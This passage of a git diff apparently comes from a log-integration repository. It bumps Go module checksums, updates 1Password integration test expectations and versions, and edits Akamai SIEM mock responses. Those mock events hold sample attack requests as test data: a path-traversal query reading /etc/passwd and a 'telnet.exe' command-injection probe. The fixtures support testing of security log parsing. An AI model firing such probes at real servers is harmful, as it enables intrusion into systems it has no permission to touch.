h1:y1WjHnz7Dj687irZUWR/WLkLc5N1YHtjLdmgWjndZn0= k8s.io/kube-openapi v0.0.0-20201113171705-d219536bb9fd/go.mod h1:WOJ3KddDSol4tAGcJo0Tvi+dK12EcqSLqcWsryKMpfM= -k8s.io/kube-openapi v0.0.0-20210421082810-95288971da7e h1:KLHHjkdQFomZy8+06csTWZ0m1343QqxZhR2LJ1OxCYM= k8s.io/kube-openapi v0.0.0-20210421082810-95288971da7e/go.mod h1:vHXdDvt9+2spS2Rx9ql3I8tycm3H9FDfdUoIuKCefvw= -k8s.io/kubectl v0.22.1 h1:kpXO+ajPNTzAVLDM9pAzCsWH9MtCMr92zpcvXMt7P6E= -k8s.io/kubectl v0.22.1/go.mod h1:mjAOgEbMNMtZWxnfM6jd+nPjPsaoLqO5xanc78WcSbw= +k8s.io/kube-openapi v0.0.0-20211109043538-20434351676c/go.mod h1:vHXdDvt9+2spS2Rx9ql3I8tycm3H9FDfdUoIuKCefvw= +k8s.io/kube-openapi v0.0.0-20211115234752-e816edb12b65 h1:E3J9oCLlaobFUqsjG9DfKbP2BmgwBL2p7pn0A3dG9W4= +k8s.io/kube-openapi v0.0.0-20211115234752-e816edb12b65/go.mod h1:sX9MT8g7NVZM5lVL/j8QyCCJe8YSMW30QvGZWaCIDIk= +k8s.io/kubectl v0.22.4/go.mod h1:ok2qRT6y2Gy4+y+mniJVyUMKeBHP4OWS9Rdtf/QTM5I= +k8s.io/kubectl v0.23.0 h1:WABWfj+Z4tC3SfKBCtZr5sIVHsFtkU9Azii4DR9IT6Y= +k8s.io/kubectl v0.23.0/go.mod h1:TfcGEs3u4dkmoC2eku1GYymdGaMtPMcaLLFrX/RB2kI= k8s.io/kubernetes v1.13.0/go.mod h1:ocZa8+6APFNC2tX1DZASIbocyYT5jHzqFVsY5aoB7Jk= -k8s.io/metrics v0.22.1/go.mod h1:i/ZNap89UkV1gLa26dn7fhKAdheJaKy+moOqJbiif7E= +k8s.io/metrics v0.22.4/go.mod h1:6F/iwuYb1w2QDCoHkeMFLf4pwHBcYKLm4mPtVHKYrIw= +k8s.io/metrics v0.23.0/go.mod h1:NDiZTwppEtAuKJ1Rxt3S4dhyRzdp6yUcJf0vo023dPo= k8s.io/utils v0.0.0-20201110183641-67b214c5f920/go.mod h1:jPW/WVKK9YHAvNhRxK0md/EJ228hCsBRufyofKtW8HA= -k8s.io/utils v0.0.0-20210707171843-4b05e18ac7d9/go.mod h1:jPW/WVKK9YHAvNhRxK0md/EJ228hCsBRufyofKtW8HA= -k8s.io/utils v0.0.0-20210819203725-bdf08cb9a70a h1:8dYfu/Fc9Gz2rNJKB9IQRGgQOh2clmRzNIPPY1xLY5g= +k8s.io/utils v0.0.0-20210802155522-efc7438f0176/go.mod h1:jPW/WVKK9YHAvNhRxK0md/EJ228hCsBRufyofKtW8HA= k8s.io/utils v0.0.0-20210819203725-bdf08cb9a70a/go.mod h1:jPW/WVKK9YHAvNhRxK0md/EJ228hCsBRufyofKtW8HA= +k8s.io/utils v0.0.0-20210930125809-cb0fa318a74b/go.mod h1:jPW/WVKK9YHAvNhRxK0md/EJ228hCsBRufyofKtW8HA= +k8s.io/utils v0.0.0-20211208161948-7d6a63dca704 h1:ZKMMxTvduyf5WUtREOqg5LiXaN1KO/+0oOQPRFrClpo= +k8s.io/utils v0.0.0-20211208161948-7d6a63dca704/go.mod h1:jPW/WVKK9YHAvNhRxK0md/EJ228hCsBRufyofKtW8HA= oras.land/oras-go v0.4.0/go.mod h1:VJcU+VE4rkclUbum5C0O7deEZbBYnsnpbGSACwTjOcg= rsc.io/binaryregexp v0.2.0/go.mod h1:qTv7/COck+e2FymRvadv62gMdZztPaShugOCi3I+8D8= rsc.io/letsencrypt v0.0.3/go.mod h1:buyQKZ6IXrRnB7TdkHP0RyEybLx18HHyOSoTyoOLqNY= @@ -1678,16 +1777,26 @@ rsc.io/sampler v1.3.0/go.mod h1:T1hPZKmBbMNahiBKFy5HrXp6adAjACjK9JXDnKaTXpA= sigs.k8s.io/apiserver-network-proxy/konnectivity-client v0.0.14/go.mod h1:LEScyzhFmoF5pso/YSeBstl57mOzx9xlU9n85RGrDQg= sigs.k8s.io/apiserver-network-proxy/konnectivity-client v0.0.15/go.mod h1:LEScyzhFmoF5pso/YSeBstl57mOzx9xlU9n85RGrDQg= sigs.k8s.io/apiserver-network-proxy/konnectivity-client v0.0.22/go.mod h1:LEScyzhFmoF5pso/YSeBstl57mOzx9xlU9n85RGrDQg= -sigs.k8s.io/kustomize/api v0.8.11 h1:LzQzlq6Z023b+mBtc6v72N2mSHYmN8x7ssgbf/hv0H8= +sigs.k8s.io/apiserver-network-proxy/konnectivity-client v0.0.25/go.mod h1:Mlj9PNLmG9bZ6BHFwFKDo5afkpWyUISkb9Me0GnK66I= +sigs.k8s.io/json v0.0.0-20211020170558-c049b76a60c6/go.mod h1:p4QtZmO4uMYipTQNzagwnNoseA6OxSUutVw05NhYDRs= +sigs.k8s.io/json v0.0.0-20211208200746-9f7c6b3444d2 h1:kDi4JBNAsJWfz1aEXhO8Jg87JJaPNLh5tIzYHgStQ9Y= +sigs.k8s.io/json v0.0.0-20211208200746-9f7c6b3444d2/go.mod h1:B+TnT182UBxE84DiCz4CVE26eOSDAeYCpfDnC2kdKMY= sigs.k8s.io/kustomize/api v0.8.11/go.mod h1:a77Ls36JdfCWojpUqR6m60pdGY1AYFix4AH83nJtY1g= +sigs.k8s.io/kustomize/api v0.10.1 h1:KgU7hfYoscuqag84kxtzKdEC3mKMb99DPI3a0eaV1d0= +sigs.k8s.io/kustomize/api v0.10.1/go.mod h1:2FigT1QN6xKdcnGS2Ppp1uIWrtWN28Ms8A3OZUZhwr8= sigs.k8s.io/kustomize/cmd/config v0.9.13/go.mod h1:7547FLF8W/lTaDf0BDqFTbZxM9zqwEJqCKN9sSR0xSs= +sigs.k8s.io/kustomize/cmd/config v0.10.2/go.mod h1:K2aW7nXJ0AaT+VA/eO0/dzFLxmpFcTzudmAgDwPY1HQ= sigs.k8s.io/kustomize/kustomize/v4 v4.2.0/go.mod h1:MOkR6fmhwG7hEDRXBYELTi5GSFcLwfqwzTRHW3kv5go= -sigs.k8s.io/kustomize/kyaml v0.11.0 h1:9KhiCPKaVyuPcgOLJXkvytOvjMJLoxpjodiycb4gHsA= +sigs.k8s.io/kustomize/kustomize/v4 v4.4.1/go.mod h1:qOKJMMz2mBP+vcS7vK+mNz4HBLjaQSWRY22EF6Tb7Io= sigs.k8s.io/kustomize/kyaml v0.11.0/go.mod h1:GNMwjim4Ypgp/MueD3zXHLRJEjz7RvtPae0AwlvEMFM= +sigs.k8s.io/kustomize/kyaml v0.13.0 h1:9c+ETyNfSrVhxvphs+K2dzT3dh5oVPPEqPOE/cUpScY= +sigs.k8s.io/kustomize/kyaml v0.13.0/go.mod h1:FTJxEZ86ScK184NpGSAQcfEqee0nul8oLCK30D47m4E= sigs.k8s.io/structured-merge-diff/v4 v4.0.2/go.mod h1:bJZC9H9iH24zzfZ/41RGcq60oK1F7G282QMXDPYydCw= sigs.k8s.io/structured-merge-diff/v4 v4.0.3/go.mod h1:bJZC9H9iH24zzfZ/41RGcq60oK1F7G282QMXDPYydCw= -sigs.k8s.io/structured-merge-diff/v4 v4.1.2 h1:Hr/htKFmJEbtMgS/UD0N+gtgctAqz81t3nu+sPzynno= sigs.k8s.io/structured-merge-diff/v4 v4.1.2/go.mod h1:j/nl6xW8vLS49O8YvXW1ocPhZawJtm+Yrr7PPRQ0Vg4= +sigs.k8s.io/structured-merge-diff/v4 v4.2.0 h1:kDvPBbnPk+qYmkHmSo8vKGp438IASWofnbbUKDE/bv0= +sigs.k8s.io/structured-merge-diff/v4 v4.2.0/go.mod h1:j/nl6xW8vLS49O8YvXW1ocPhZawJtm+Yrr7PPRQ0Vg4= sigs.k8s.io/yaml v1.1.0/go.mod h1:UJmg0vDUVViEyp3mgSv9WPwZCDxu4rQW1olrI1uml+o= -sigs.k8s.io/yaml v1.2.0 h1:kr/MCeFWJWTwyaHoR9c8EjH9OumOmoF9YGiZd7lFm/Q= sigs.k8s.io/yaml v1.2.0/go.mod h1:yfXDCHCao9+ENCvLSE62v9VSji2MKu5jeNfTrofGhJc= +sigs.k8s.io/yaml v1.3.0 h1:a2VclLzOGrwOHDiV8EfBGhvjHvP46CtW5j6POvhYGGo= +sigs.k8s.io/yaml v1.3.0/go.mod h1:GeOyir5tyXNByN85N/dRIT9es5UQNerPYEKK56eTBm8= diff --git a/packages/1password/changelog.yml b/packages/1password/changelog.yml index 3ae475f53fd..d07d03ec49b 100644 --- a/packages/1password/changelog.yml +++ b/packages/1password/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.2.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.2.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/1password/data_stream/item_usages/_dev/test/pipeline/test-itemusages.json-expected.json b/packages/1password/data_stream/item_usages/_dev/test/pipeline/test-itemusages.json-expected.json index c5e3363a0aa..03c1f4e45a8 100644 --- a/packages/1password/data_stream/item_usages/_dev/test/pipeline/test-itemusages.json-expected.json +++ b/packages/1password/data_stream/item_usages/_dev/test/pipeline/test-itemusages.json-expected.json @@ -34,14 +34,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -53,7 +53,7 @@ "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-09T13:30:28.123174500Z", + "ingested": "2021-12-14T14:34:03.382903193Z", "original": "{\"uuid\":\"MCQODBBWJD5HISKYNP3HJPV2DV\",\"timestamp\":\"2021-08-30T18:57:42.484Z\",\"used_version\":1,\"vault_uuid\":\"jaqxqf5qylslqiitnduawrndc5\",\"item_uuid\":\"bvwmmwxisuca7wbehrbyqhag54\",\"user\":{\"uuid\":\"OJQGU46KAPROEJLCK674RHSAY5\",\"name\":\"Name\",\"email\":\"email@1password.com\"},\"client\":{\"app_name\":\"1Password Browser Extension\",\"app_version\":\"1109\",\"platform_name\":\"Chrome\",\"platform_version\":\"93.0.4577.62\",\"os_name\":\"Android\",\"os_version\":\"10\",\"ip_address\":\"89.160.20.156\"}}", "category": [ "file" @@ -107,14 +107,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -126,7 +126,7 @@ "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-09T13:30:28.123178700Z", + "ingested": "2021-12-14T14:34:03.382906002Z", "original": "{\"uuid\":\"5HBWJDWCQADISKY2DVBNP3HJPV\",\"timestamp\":\"2021-08-30T19:10:00.123Z\",\"used_version\":1,\"vault_uuid\":\"jaqxqf5qylslqiitnduawrndc5\",\"item_uuid\":\"bvwmmwxisuca7wbehrbyqhag54\",\"user\":{\"uuid\":\"OJQGU46KAPROEJLCK674RHSAY5\",\"name\":\"Name\",\"email\":\"email@1password.com\"},\"client\":{\"app_name\":\"1Password Browser Extension\",\"app_version\":\"1109\",\"platform_name\":\"Chrome\",\"platform_version\":\"93.0.4577.62\",\"os_name\":\"Android\",\"os_version\":\"10\",\"ip_address\":\"89.160.20.156\"}}", "category": [ "file" diff --git a/packages/1password/data_stream/signin_attempts/_dev/test/pipeline/test-signinattempts.json-expected.json b/packages/1password/data_stream/signin_attempts/_dev/test/pipeline/test-signinattempts.json-expected.json index 42bc15c2db4..12d9ae5c4b8 100644 --- a/packages/1password/data_stream/signin_attempts/_dev/test/pipeline/test-signinattempts.json-expected.json +++ b/packages/1password/data_stream/signin_attempts/_dev/test/pipeline/test-signinattempts.json-expected.json @@ -35,14 +35,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -54,7 +54,7 @@ "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-09T13:30:28.577677500Z", + "ingested": "2021-12-14T14:34:03.790583740Z", "original": "{\"uuid\":\"HGIF4OEWXDTVWKEQDIWTKV26HU\",\"session_uuid\":\"UED4KFZ5BH37IQWTJ7LG4VPWK7\",\"timestamp\":\"2021-08-11T14:28:03Z\",\"country\":\"AR\",\"category\":\"success\",\"type\":\"credentials_ok\",\"details\":null,\"target_user\":{\"uuid\":\"OJQGU46KAPROEJLCK674RHSAY5\",\"name\":\"Name\",\"email\":\"email@1password.com\"},\"client\":{\"app_name\":\"1Password Browser Extension\",\"app_version\":\"1109\",\"platform_name\":\"Chrome\",\"platform_version\":\"93.0.4577.62\",\"os_name\":\"Android\",\"os_version\":\"10\",\"ip_address\":\"89.160.20.156\"}}", "created": "2021-08-30T22:57:42.484Z", "kind": "event", @@ -111,14 +111,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -130,7 +130,7 @@ "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-09T13:30:28.577687Z", + "ingested": "2021-12-14T14:34:03.790586281Z", "original": "{\"uuid\":\"QVWKEOEWXU2DIDHWTK6HGIF4TV\",\"session_uuid\":\"UED4KFZ5BH37IQWTJ7LG4VPWK7\",\"timestamp\":\"2021-08-11T15:04:22Z\",\"country\":\"AR\",\"category\":\"credentials_failed\",\"type\":\"password_secret_bad\",\"details\":null,\"target_user\":{\"uuid\":\"OJQGU46KAPROEJLCK674RHSAY5\",\"name\":\"Name\",\"email\":\"email@1password.com\"},\"client\":{\"app_name\":\"1Password Browser Extension\",\"app_version\":\"1109\",\"platform_name\":\"Chrome\",\"platform_version\":\"93.0.4577.62\",\"os_name\":\"Android\",\"os_version\":\"10\",\"ip_address\":\"89.160.20.156\"}}", "created": "2021-08-30T22:57:42.484Z", "kind": "event", diff --git a/packages/1password/manifest.yml b/packages/1password/manifest.yml index d2cfdae6fe6..0a254f0d641 100644 --- a/packages/1password/manifest.yml +++ b/packages/1password/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: 1password title: "1Password Events Reporting" -version: 0.2.1 +version: 0.2.2 license: basic description: Collect events from 1Password Events API with Elastic Agent. type: integration diff --git a/packages/akamai/_dev/deploy/docker/files/config.yml b/packages/akamai/_dev/deploy/docker/files/config.yml index c9e173a28d6..84ee8be0c8c 100644 --- a/packages/akamai/_dev/deploy/docker/files/config.yml +++ b/packages/akamai/_dev/deploy/docker/files/config.yml @@ -8,8 +8,8 @@ rules: responses: - status_code: 200 body: |- - {"format":"json","type":"akamai_siem","version":"1.0","attackData":{"clientIP":"52.91.36.10","configId":"14227","policyId":"qik1_26545","ruleActions":"YWxlcnQ%3d%3bYWxlcnQ%3d%3bZGVueQ%3d%3d","ruleData":"dGVsbmV0LmV4ZQ%3d%3d%3bdGVsbmV0LmV4ZQ%3d%3d%3bVmVjdG9yIFNjb3JlOiAxMCwgREVOWSB0aHJlc2hvbGQ6IDksIEFsZX ","ruleMessages":"U3lzdGVtIENvbW1hbmQgQWNjZXNz%3bU3lzdGVtIENvbW1hbmQgSW5qZWN0aW9u%3bQW5vbWFseSBTY29yZSBFeGNlZWRlZCBmb3 ","ruleSelectors":"QVJHUzpvcHRpb24%3d%3bQVJHUzpvcHRpb24%3d%3b","ruleTags":"T1dBU1BfQ1JTL1dFQl9BVFRBQ0svRklMRV9JTkpFQ1RJT04%3d%3bT1dBU1BfQ1JTL1dFQl9BVFRBQ0svQ09NTUFORF9JTkpFQ1R ","ruleVersions":"NA%3d%3d%3bNA%3d%3d%3bMQ%3d%3d","rules":"OTUwMDAy%3bOTUwMDA2%3bQ01ELUlOSkVDVElPTi1BTk9NQUxZ"},"geo":{"asn":"14618","city":"ASHBURN","continent":"288","country":"US","regionCode":"VA"},"httpMessage":{"bytes":"266","host":"www.hmapi.com","method":"GET","path":"/","port":"80","protocol":"HTTP/1.1","query":"option=com_jce%20telnet.exe","requestHeaders":"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml","requestId":"1158db1758e37bfe67b7c091","responseHeaders":"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml%0d%0aContent-Length%3a%20150","start":"1491303422","status":"200"},"userRiskData":{"uuid":"964d54b7-0821-413a-a4d6-8131770ec8d5","status":"0","score":"75","risk":"udfp:1325gdg4g4343g/M|unp:74256/H","trust":"ugp:US","general":"duc_1h:10|duc_1d:30","allow":"0"},"clientData":{"appBundleId":"com.mydomain.myapp","appVersion":"1.23","sdkVersion":"4.7.1","telemetryType":"2"},"botData":{"botScore":"100","responseSegment":"3"}} - {"format":"json","type":"akamai_siem","version":"1.0","attackData":{"clientIP":"52.91.36.10","configId":"6724","policyId":"scoe_5426","ruleActions":"QUxFUlQ;REVOWQ==","ruleData":"YWxlcnQo;Y3VybA==","ruleMessages":"Q3Jvc3Mtc2l0ZSBTY3 JpcHRpbmcgKFhTUykgQXR0YWNr; UmVxdWVzdCBJbmRpY2F0ZXMgYW4 gYXV0b21hdGVkIHByb2 dyYW0gZXhwbG9yZWQgdGhlIHNpdGU=","ruleSelectors":"QVJHUzph;UkVRVUVTVF9IRU FERVJTOlVzZXItQWdlbnQ=","ruleTags":"V0VCX0FUVEFDSy9YU1M=;QV VUT01BVElPTi9NSVND","ruleVersions":";","rules":"OTUwMDA0;OTkwMDEx"},"geo":{"asn":"12271","city":"NEWYORK","continent":"NA","country":"US","regionCode":"NY"},"httpMessage":{"bytes":"34523","host":"www.example.com","method":"POST","path":"/examples/1/","port":"80","protocol":"http/2","query":"a%3D..%2F..%2F..%2Fetc%2Fpasswd","requestHeaders":"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml","requestId":"2ab418ac8515f331","responseHeaders":"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml","start":"1470923133.026","status":"301","tls": "TLSv1.2"},"userRiskData":{"uuid":"964d54b7-0821-413a-a4d6-8131770ec8d5","status":"0","score":"75","risk":"udfp:1325gdg4g4343g/M|unp:74256/H","trust":"ugp:US","general":"duc_1h:10|duc_1d:30","allow":"0"},"clientData":{"appBundleId":"com.mydomain.myapp","appVersion":"1.23","sdkVersion":"4.7.1","telemetryType":"2"},"botData":{"botScore":"100","responseSegment":"3"}} + {"format":"json","type":"akamai_siem","version":"1.0","attackData":{"clientIP":"89.160.20.156","configId":"14227","policyId":"qik1_26545","ruleActions":"YWxlcnQ%3d%3bYWxlcnQ%3d%3bZGVueQ%3d%3d","ruleData":"dGVsbmV0LmV4ZQ%3d%3d%3bdGVsbmV0LmV4ZQ%3d%3d%3bVmVjdG9yIFNjb3JlOiAxMCwgREVOWSB0aHJlc2hvbGQ6IDksIEFsZX ","ruleMessages":"U3lzdGVtIENvbW1hbmQgQWNjZXNz%3bU3lzdGVtIENvbW1hbmQgSW5qZWN0aW9u%3bQW5vbWFseSBTY29yZSBFeGNlZWRlZCBmb3 ","ruleSelectors":"QVJHUzpvcHRpb24%3d%3bQVJHUzpvcHRpb24%3d%3b","ruleTags":"T1dBU1BfQ1JTL1dFQl9BVFRBQ0svRklMRV9JTkpFQ1RJT04%3d%3bT1dBU1BfQ1JTL1dFQl9BVFRBQ0svQ09NTUFORF9JTkpFQ1R ","ruleVersions":"NA%3d%3d%3bNA%3d%3d%3bMQ%3d%3d","rules":"OTUwMDAy%3bOTUwMDA2%3bQ01ELUlOSkVDVElPTi1BTk9NQUxZ"},"geo":{"asn":"14618","city":"ASHBURN","continent":"288","country":"US","regionCode":"VA"},"httpMessage":{"bytes":"266","host":"www.hmapi.com","method":"GET","path":"/","port":"80","protocol":"HTTP/1.1","query":"option=com_jce%20telnet.exe","requestHeaders":"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml","requestId":"1158db1758e37bfe67b7c091","responseHeaders":"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml%0d%0aContent-Length%3a%20150","start":"1491303422","status":"200"},"userRiskData":{"uuid":"964d54b7-0821-413a-a4d6-8131770ec8d5","status":"0","score":"75","risk":"udfp:1325gdg4g4343g/M|unp:74256/H","trust":"ugp:US","general":"duc_1h:10|duc_1d:30","allow":"0"},"clientData":{"appBundleId":"com.mydomain.myapp","appVersion":"1.23","sdkVersion":"4.7.1","telemetryType":"2"},"botData":{"botScore":"100","responseSegment":"3"}} + {"format":"json","type":"akamai_siem","version":"1.0","attackData":{"clientIP":"89.160.20.156","configId":"6724","policyId":"scoe_5426","ruleActions":"QUxFUlQ;REVOWQ==","ruleData":"YWxlcnQo;Y3VybA==","ruleMessages":"Q3Jvc3Mtc2l0ZSBTY3 JpcHRpbmcgKFhTUykgQXR0YWNr; UmVxdWVzdCBJbmRpY2F0ZXMgYW4 gYXV0b21hdGVkIHByb2 dyYW0gZXhwbG9yZWQgdGhlIHNpdGU=","ruleSelectors":"QVJHUzph;UkVRVUVTVF9IRU FERVJTOlVzZXItQWdlbnQ=","ruleTags":"V0VCX0FUVEFDSy9YU1M=;QV VUT01BVElPTi9NSVND","ruleVersions":";","rules":"OTUwMDA0;OTkwMDEx"},"geo":{"asn":"12271","city":"NEWYORK","continent":"NA","country":"US","regionCode":"NY"},"httpMessage":{"bytes":"34523","host":"www.example.com","method":"POST","path":"/examples/1/","port":"80","protocol":"http/2","query":"a%3D..%2F..%2F..%2Fetc%2Fpasswd","requestHeaders":"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml","requestId":"2ab418ac8515f331","responseHeaders":"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml","start":"1470923133.026","status":"301","tls": "TLSv1.2"},"userRiskData":{"uuid":"964d54b7-0821-413a-a4d6-8131770ec8d5","status":"0","score":"75","risk":"udfp:1325gdg4g4343g/M|unp:74256/H","trust":"ugp:US","general":"duc_1h:10|duc_1d:30","allow":"0"},"clientData":{"appBundleId":"com.mydomain.myapp","appVersion":"1.23","sdkVersion":"4.7.1","telemetryType":"2"},"botData":{"botScore":"100","responseSegment":"3"}} - path: /siem/v1/configs/aaaa methods: ["GET"] request_headers: @@ -20,6 +20,6 @@ rules: responses: - status_code: 200 body: |- - {"format":"json","type":"akamai_siem","version":"1.0","attackData":{"clientIP":"52.91.36.10","configId":"14227","policyId":"qik1_26545","ruleActions":"YWxlcnQ%3d%3bYWxlcnQ%3d%3bZGVueQ%3d%3d","ruleData":"dGVsbmV0LmV4ZQ%3d%3d%3bdGVsbmV0LmV4ZQ%3d%3d%3bVmVjdG9yIFNjb3JlOiAxMCwgREVOWSB0aHJlc2hvbGQ6IDksIEFsZX ","ruleMessages":"U3lzdGVtIENvbW1hbmQgQWNjZXNz%3bU3lzdGVtIENvbW1hbmQgSW5qZWN0aW9u%3bQW5vbWFseSBTY29yZSBFeGNlZWRlZCBmb3 ","ruleSelectors":"QVJHUzpvcHRpb24%3d%3bQVJHUzpvcHRpb24%3d%3b","ruleTags":"T1dBU1BfQ1JTL1dFQl9BVFRBQ0svRklMRV9JTkpFQ1RJT04%3d%3bT1dBU1BfQ1JTL1dFQl9BVFRBQ0svQ09NTUFORF9JTkpFQ1R ","ruleVersions":"NA%3d%3d%3bNA%3d%3d%3bMQ%3d%3d","rules":"OTUwMDAy%3bOTUwMDA2%3bQ01ELUlOSkVDVElPTi1BTk9NQUxZ"},"geo":{"asn":"14618","city":"ASHBURN","continent":"288","country":"US","regionCode":"VA"},"httpMessage":{"bytes":"266","host":"www.hmapi.com","method":"GET","path":"/","port":"80","protocol":"HTTP/1.1","query":"option=com_jce%20telnet.exe","requestHeaders":"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml","requestId":"1158db1758e37bfe67b7c09","responseHeaders":"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml%0d%0aContent-Length%3a%20150","start":"1491303422","status":"200"},"userRiskData":{"uuid":"964d54b7-0821-413a-a4d6-8131770ec8d5","status":"0","score":"75","risk":"udfp:1325gdg4g4343g/M|unp:74256/H","trust":"ugp:US","general":"duc_1h:10|duc_1d:30","allow":"0"},"clientData":{"appBundleId":"com.mydomain.myapp","appVersion":"1.23","sdkVersion":"4.7.1","telemetryType":"2"},"botData":{"botScore":"100","responseSegment":"3"}} - {"format":"json","type":"akamai_siem","version":"1.0","attackData":{"clientIP":"52.91.36.10","configId":"6724","policyId":"scoe_5426","ruleActions":"QUxFUlQ;REVOWQ==","ruleData":"YWxlcnQo;Y3VybA==","ruleMessages":"Q3Jvc3Mtc2l0ZSBTY3 JpcHRpbmcgKFhTUykgQXR0YWNr; UmVxdWVzdCBJbmRpY2F0ZXMgYW4 gYXV0b21hdGVkIHByb2 dyYW0gZXhwbG9yZWQgdGhlIHNpdGU=","ruleSelectors":"QVJHUzph;UkVRVUVTVF9IRU FERVJTOlVzZXItQWdlbnQ=","ruleTags":"V0VCX0FUVEFDSy9YU1M=;QV VUT01BVElPTi9NSVND","ruleVersions":";","rules":"OTUwMDA0;OTkwMDEx"},"geo":{"asn":"12271","city":"NEWYORK","continent":"NA","country":"US","regionCode":"NY"},"httpMessage":{"bytes":"34523","host":"www.example.com","method":"POST","path":"/examples/1/","port":"80","protocol":"http/2","query":"a%3D..%2F..%2F..%2Fetc%2Fpasswd","requestHeaders":"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml","requestId":"2ab418ac8515f33","responseHeaders":"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml","start":"1470923133.026","status":"301","tls": "TLSv1.2"},"userRiskData":{"uuid":"964d54b7-0821-413a-a4d6-8131770ec8d5","status":"0","score":"75","risk":"udfp:1325gdg4g4343g/M|unp:74256/H","trust":"ugp:US","general":"duc_1h:10|duc_1d:30","allow":"0"},"clientData":{"appBundleId":"com.mydomain.myapp","appVersion":"1.23","sdkVersion":"4.7.1","telemetryType":"2"},"botData":{"botScore":"100","responseSegment":"3"}} + {"format":"json","type":"akamai_siem","version":"1.0","attackData":{"clientIP":"89.160.20.156","configId":"14227","policyId":"qik1_26545","ruleActions":"YWxlcnQ%3d%3bYWxlcnQ%3d%3bZGVueQ%3d%3d","ruleData":"dGVsbmV0LmV4ZQ%3d%3d%3bdGVsbmV0LmV4ZQ%3d%3d%3bVmVjdG9yIFNjb3JlOiAxMCwgREVOWSB0aHJlc2hvbGQ6IDksIEFsZX ","ruleMessages":"U3lzdGVtIENvbW1hbmQgQWNjZXNz%3bU3lzdGVtIENvbW1hbmQgSW5qZWN0aW9u%3bQW5vbWFseSBTY29yZSBFeGNlZWRlZCBmb3 ","ruleSelectors":"QVJHUzpvcHRpb24%3d%3bQVJHUzpvcHRpb24%3d%3b","ruleTags":"T1dBU1BfQ1JTL1dFQl9BVFRBQ0svRklMRV9JTkpFQ1RJT04%3d%3bT1dBU1BfQ1JTL1dFQl9BVFRBQ0svQ09NTUFORF9JTkpFQ1R ","ruleVersions":"NA%3d%3d%3bNA%3d%3d%3bMQ%3d%3d","rules":"OTUwMDAy%3bOTUwMDA2%3bQ01ELUlOSkVDVElPTi1BTk9NQUxZ"},"geo":{"asn":"14618","city":"ASHBURN","continent":"288","country":"US","regionCode":"VA"},"httpMessage":{"bytes":"266","host":"www.hmapi.com","method":"GET","path":"/","port":"80","protocol":"HTTP/1.1","query":"option=com_jce%20telnet.exe","requestHeaders":"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml","requestId":"1158db1758e37bfe67b7c09","responseHeaders":"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml%0d%0aContent-Length%3a%20150","start":"1491303422","status":"200"},"userRiskData":{"uuid":"964d54b7-0821-413a-a4d6-8131770ec8d5","status":"0","score":"75","risk":"udfp:1325gdg4g4343g/M|unp:74256/H","trust":"ugp:US","general":"duc_1h:10|duc_1d:30","allow":"0"},"clientData":{"appBundleId":"com.mydomain.myapp","appVersion":"1.23","sdkVersion":"4.7.1","telemetryType":"2"},"botData":{"botScore":"100","responseSegment":"3"}} + 